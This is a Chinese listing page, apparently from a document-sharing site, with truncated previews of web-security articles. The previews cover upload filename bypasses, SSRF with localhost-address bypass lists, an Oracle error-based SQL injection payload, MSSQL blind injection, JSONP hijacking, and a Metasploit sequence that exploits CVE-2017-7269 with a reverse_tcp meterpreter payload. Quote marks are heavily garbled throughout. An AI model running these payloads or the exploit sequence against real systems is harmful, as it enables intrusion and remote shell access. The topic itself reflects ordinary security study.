共 72 篇文章 |
|
filename=''''''''a.php'''''''' 去除form-data Content-Disposition: AAAAAAAA=''''''''BBBBBBBB''''''''; name=''''''''file''''''''... 阅11 转0 评0 公众公开 24-04-04 22:19 |
写一个1.php文件功能是接受url,并将它给一个变量,然后打印出来<?php$url=$_GET[''''''''url''''''''];$content=file_get_contents($url);echo $content;?>356关源码分析操作url=http://0/flag.php.只能加载外部地址,所以我们在自己的云服务器上进行重定向服务器操作服... 阅3 转0 评0 公众公开 24-03-25 19:33 |
根据攻击类型和漏洞执行的不同,XSS漏洞主要分为以下三种类型:反射型XSS(Reflected XSS)、存储型XSS(Stored XSS)、DOM型XSS(DOM-based XSS)。3、DOM型XSS:DOM型XSS漏洞发生在浏览器的客户端,而不是在服务器上。本文从安全攻防的角度针对常见WEB漏洞的原理和防护措施进行了总结,涵盖SQL注入、XSS漏洞、文件上传、CSRF漏洞、SSRF漏洞等... 阅6 转0 评0 公众公开 24-03-11 08:33 |
Oracle使用查询语句获取数据时需要跟上表名,没有表的情况下可以使用dual,dual是Oracle的虚拟表,用来构成select的语法规则,Oracle保证dual里面永远只有一条记录。1'''''''' and 1=ctxsys.drithsx.sn(1,(select user from dual))--CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1))an... 阅21 转0 评0 公众公开 23-12-14 14:23 |
1 http://0.0.0.0/http://0/http://127.0.0.1 http://localhost http://127.255.255.254 127.0.0.1 - 127.255.255.254 http://[::1] http://[::ffff:7f00:1] http://[::ffff:127.0.0.1] http://127.1 http://127.0.1 http://0:80.尝试使用不同的URL编码方法,如字符编码,双重编码等,绕过输入验证和过滤对请求得内部地址进行URL编码或者二次URL编... 阅14 转0 评0 公众公开 23-11-21 20:36 |
所以当我们获取到普通用户权限时,我们只拥有单个数据库权限,甚至文件读写失败;取得高权限用户权限,不仅可以查看所有数据库,还可以对服务器文件进行读写操作。mysql中存在4个控制权限的表,分别为user表,db表,tables_priv表,columns_priv表,User表:存放用户账户信息以及全局级别(所有数据库)权限,决定了来自哪些主机的哪些用户可以访问... 阅17 转0 评0 公众公开 23-11-12 16:53 |
msfconsolesearch cve-2017-7269use exploit/windows/iis/cve-2017-7269set payload windows/meterpreter/reverse_tcpshow optionsset rhost 192.168.1.10set lhost 192.168.1.100show optionsrunshell.msf > use exploit/multi/handlermsf exploit(handler) >set payload windows/meterpreter/reverse_tcpmsf exploit(handler) >set ... 阅66 转0 评0 公众公开 23-11-12 16:42 |
结合近几年披露的与越权相关的 Web 应用通用漏洞披露(Common Vulnerability and Exposures,CVE)漏洞,通过分析 Web 越权漏洞成因和常见攻击方法,提出了针对 Web 越权漏洞攻击的防范方法。常见的漏洞有结构化查询语言(Structured Query Language,SQL)注入漏洞、跨站脚本漏洞(Cross Site Script,XSS)、跨站请求伪造漏洞(Cross Site Re... 阅8 转0 评0 公众公开 23-11-02 15:00 |
有些函数与Mysql的类似就不过多介绍了,不过要注意的是MSSQL 数据库是强类型语言数据库,当类型不一致时将会报错。asp、.net:mssqlphp:mysql、postgresqljava:oracle、mysqliis:mssqlapache:mysql、postgresql。在使用盲注的时候,会经常用到 substr() 、substring() 、mid() 等函数。如果在测试过程中发现substr()函数被拦截则可以尝试用... 阅81 转0 评0 公众公开 23-10-23 07:54 |
JSONP跨域漏洞主要是callback自定义导致的XSS和JSONP劫持。我们知道,在JSONP跨域中,我们是可以传入一个函数名的参数如callback,然后JSONP端点会根据我们的传参动态生成JSONP数据响应回来。<html><head> <title>lol</title> <meta charset=''''''''utf-8'''... 阅512 转2 评0 公众公开 23-08-22 06:59 |